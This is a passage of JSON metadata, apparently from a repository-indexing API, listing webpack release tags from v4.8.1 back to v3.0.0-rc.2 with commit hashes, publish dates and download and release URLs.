ck@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecos